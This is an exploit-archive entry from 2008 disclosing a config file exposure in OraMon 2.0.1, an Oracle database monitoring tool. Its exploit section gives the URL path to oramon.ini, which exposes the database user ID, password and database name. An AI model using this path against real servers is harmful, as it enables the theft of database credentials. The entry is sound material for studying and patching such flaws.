id: 4308
date: 11/29/2008
title: OraMon 2.0.1 Remote Config File Disclosure Vulnerability
author: ahmadbady
cves: 

========================================================
OraMon 2.0.1 Remote Config File Disclosure Vulnerability
========================================================


........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini

   
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




#  0day.today [2023-03-27]  #